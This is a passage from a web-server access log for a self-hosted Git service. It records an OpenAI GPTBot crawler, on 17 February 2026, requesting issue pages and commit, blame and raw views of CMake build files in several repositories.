+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&state=open&type=all" -[17/Feb/2026:18:12:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&state=open&type=all" [Client 74.7.227.38] [Length 10165] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:18:12:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 10245] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python3" -[17/Feb/2026:18:12:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:12:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13733] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:12:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12777] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:12:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13611] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:12:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13730] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:12:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13730] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:12:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13731] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:12:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" [Client 74.7.227.38] [Length 9994] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" -[17/Feb/2026:18:13:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" [Client 74.7.227.38] [Length 23181] [Gzip 19.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" -[17/Feb/2026:18:13:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13731] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:13:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/python3" -[17/Feb/2026:18:13:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/python3" -[17/Feb/2026:18:13:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/python3" -[17/Feb/2026:18:13:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/python3" -[17/Feb/2026:18:13:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 9990] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:18:13:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13915] [Gzip 8.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:18:13:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 9997] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:18:13:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 9989] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:18:13:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 9991] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:18:13:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 9989] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:18:13:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13912] [Gzip 8.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:18:13:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 9987] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:18:13:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 9988] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:18:13:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13915] [Gzip 8.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:18:13:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13911] [Gzip 8.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:18:13:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13915] [Gzip 8.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:18:13:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12464] [Gzip 6.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:18:13:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 1694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:18:13:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13608] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:13:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" [Client 74.7.227.38] [Length 9974] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" -[17/Feb/2026:18:13:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 1694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:18:13:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13533] [Gzip 8.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:18:13:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13733] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:13:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13609] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:13:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" [Client 74.7.227.38] [Length 9996] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" -[17/Feb/2026:18:13:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" [Client 74.7.227.38] [Length 9968] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" -[17/Feb/2026:18:13:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13533] [Gzip 8.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:18:13:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13735] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:13:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" [Client 74.7.227.38] [Length 10788] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" -[17/Feb/2026:18:13:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 9996] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:18:13:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13608] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:13:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12779] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:13:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12777] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:13:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr 